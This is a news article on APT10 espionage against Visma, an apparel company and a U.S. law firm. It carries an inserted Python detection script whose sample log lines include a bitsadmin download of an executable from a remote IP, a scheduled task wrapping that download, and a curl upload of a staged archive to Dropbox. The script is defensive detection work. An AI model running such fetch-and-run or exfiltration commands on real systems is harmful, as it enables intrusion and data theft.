China-linked cyber-espionage group APT10 has targeted companies in the United States and Europe to steal intellectual property or gain commercial advantage, Recorded Future security researchers say.
The attacks, observed between November 2017 and September 2018, hit at least three companies, namely Norwegian IT and business managed service provider (MSP) Visma, an international apparel company, and a U.S. law firm with strong experience in intellectual property law.
The Chinese hackers used Citrix and LogMeIn remote-access software and stolen valid user credentials to access the networks of targeted companies. For privilege escalation, DLL sideloading techniques previously associated with APT10 were used.
Malware deployed in the attacks includes Trochilus, used in the Visma incident, and a unique version of the UPPERCUT (ANEL) backdoor, used in the other two incidents. Mimikatz was also used for credential harvesting.
This malware, too, had previously been associated with the cyber-spies. Other APT10 Tactics, Techniques and Procedures (TTPs) observed in these attacks include the use of BITSAdmin-scheduled tasks to transfer tools from the command and control (C&C) server.
In the attacks on Visma and the apparel company, data was exfiltrated to a Dropbox account. Dropbox was used in the attack on the U.S. law firm as well, where the cURL for Windows command-line tool handled the exfiltration, as it had in the Visma incident.
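The two TTPs above, BITSAdmin jobs (on their own or registered through a scheduled task) pulling tools from a remote host, and cURL pushing data to Dropbox, both leave a recognizable trace in process-creation telemetry. The following is an added illustration, not code from the article or from Recorded Future, of a small set of detection rules run over constructed process-creation records in an "image|parent image|command line" shape modelled on Sysmon event 1. The IP address, file paths, task name and token in the sample lines are constructed; the `content.dropboxapi.com` host is Dropbox's real upload endpoint, and the `bitsadmin`, `schtasks` and `curl` switches are the tools' documented ones.

```python
"""Flag process-creation records that match the tool-transfer and
exfiltration tradecraft the article attributes to APT10: BITSAdmin
transfers from a remote host (directly or wrapped in a scheduled task)
and curl uploads to a Dropbox host. Added example, not code from the
article or from Recorded Future; the log lines below are constructed."""
import re
from typing import Dict, List

# Constructed process-creation records: image|parent image|command line.
SAMPLE_EVENTS = [
    "C:\\Windows\\System32\\bitsadmin.exe|cmd.exe|bitsadmin /transfer job1 /download /priority high http://203.0.113.10/t.exe C:\\Users\\Public\\t.exe",
    "C:\\Windows\\System32\\schtasks.exe|cmd.exe|schtasks /create /tn Updater /tr \"bitsadmin /transfer u http://203.0.113.10/u.exe C:\\ProgramData\\u.exe\" /sc minute /mo 30",
    "C:\\Tools\\curl.exe|cmd.exe|curl -X POST https://content.dropboxapi.com/2/files/upload -H \"Authorization: Bearer TOKEN\" --data-binary @C:\\staging\\archive.7z",
    "C:\\Windows\\System32\\bitsadmin.exe|svchost.exe|bitsadmin /list /allusers",
    "C:\\Tools\\curl.exe|cmd.exe|curl -s https://example.org/",
    "C:\\Windows\\System32\\schtasks.exe|explorer.exe|schtasks /query /fo LIST",
]

# Host part of every http(s) URL on the command line.
URL_RE = re.compile(r"https?://([^\s/\"']+)", re.IGNORECASE)
# BITS switches that create a job or add a remote file to one.
BITS_SWITCH_RE = re.compile(r"(?<!\S)/(?:transfer|addfile|create)\b", re.IGNORECASE)
# curl options that send a local file or request body, or force an upload verb.
CURL_UPLOAD_RE = re.compile(
    r"(?<!\S)(?:-T|--upload-file|--data-binary|-d|--data|-F|--form)(?!\S)"
    r"|(?<!\S)-X\s+(?:POST|PUT)\b",
    re.IGNORECASE,
)
SCHTASKS_CREATE_RE = re.compile(r"(?<!\S)/create\b", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split an image|parent|command line record into its three fields."""
    image, parent, command_line = line.split("|", 2)
    return {"image": image, "parent": parent, "command_line": command_line}


def remote_hosts(command_line: str) -> List[str]:
    """Return the lower-cased host of every http(s) URL in the command line."""
    return [m.group(1).lower() for m in URL_RE.finditer(command_line)]


def rules_for(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event triggers, in rule order."""
    cmd = event["command_line"]
    image = event["image"].lower()
    hosts = remote_hosts(cmd)
    hits: List[str] = []

    # 1. bitsadmin creating or feeding a job that fetches from a URL,
    #    however it was launched (directly, via cmd, or as a task action).
    if "bitsadmin" in cmd.lower() and BITS_SWITCH_RE.search(cmd) and hosts:
        hits.append("bitsadmin_remote_transfer")

    # 2. schtasks registering a task whose action runs bitsadmin.
    if (image.endswith("schtasks.exe") and SCHTASKS_CREATE_RE.search(cmd)
            and "bitsadmin" in cmd.lower()):
        hits.append("scheduled_bits_transfer")

    # 3. curl sending a file or body to a Dropbox host.
    if (image.endswith("curl.exe") and CURL_UPLOAD_RE.search(cmd)
            and any("dropbox" in h for h in hosts)):
        hits.append("curl_dropbox_upload")

    return hits


def analyze(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every record and return one alert per rule hit."""
    alerts: List[Dict[str, object]] = []
    for index, line in enumerate(lines):
        event = parse_event(line)
        for rule in rules_for(event):
            alerts.append({"index": index, "rule": rule,
                           "command_line": event["command_line"]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] event {alert['index']}: {alert['command_line']}")
```

The rules key on the combination of tool, switch and remote host rather than on the tool alone, so the routine `bitsadmin /list`, `schtasks /query` and plain `curl -s` records in the sample pass silently while the three transfer and upload records each raise an alert; the scheduled-task record raises two, one for the task registration and one for the BITS transfer it wraps.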
“We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date. On top of the breadth, volume, and targets of attacks that APT10 has conducted since at least 2016, we now know that these operations are being run by the Chinese intelligence agency, the Ministry of State Security (MSS),” Recorded Future notes.
Also known as menuPass, Stone Panda, and CVNX, and tracked since 2009, APT10 has historically focused on Japanese entities, but expanded its target list in 2017, when it hit entities in at least fourteen countries, including the website of a prominent U.S. trade association.
In December last year, the United States, United Kingdom, Canada, Australia, New Zealand and Japan officially blamed APT10 for a series of cyberattacks launched against organizations around the world. The U.S. has also indicted two alleged hackers believed to be part of APT10.
In April 2017, PwC UK and BAE Systems published a report on Operation Cloud Hopper, a massive campaign in which the Chinese hackers targeted managed IT service providers and their clients. Similarly, the attack on Visma was likely aimed at “enabling secondary intrusions onto their client networks, and not of stealing Visma intellectual property,” Recorded Future says.
The attacks on the U.S. law firm (which has clients in the pharmaceutical, technology, electronics, biomedical, and automotive sectors, among others) and the international apparel company, however, were likely meant to gather information for commercial advantage.
The modified version of Trochilus malware used in this campaign had its C&C communications encrypted using a combination of RC4 and Salsa20 stream ciphers, unlike previously observed iterations, which only used RC4, the researchers say.
A Rapid7 investigation into the campaign revealed that the U.S. law firm was targeted first, in late 2017, followed by the apparel company a few months later, and Visma in August 2018. All three attacks involved the targeting of Citrix remote desktops and the use of the same DLL sideloading technique.
During the investigation, the researchers learned that portions of what is now referred to as APT10 will be recategorized as a new group, but they say there isn’t sufficient data at this time to make that distinction.
“This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations, led by the U.S. Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security. Crucially, the variety of businesses targeted proves that these campaigns are being conducted against corporations across the commercial spectrum, aimed at undermining international norms in trade to erode the competitive advantage of companies that have invested heavily in patented technology,” Recorded Future concludes.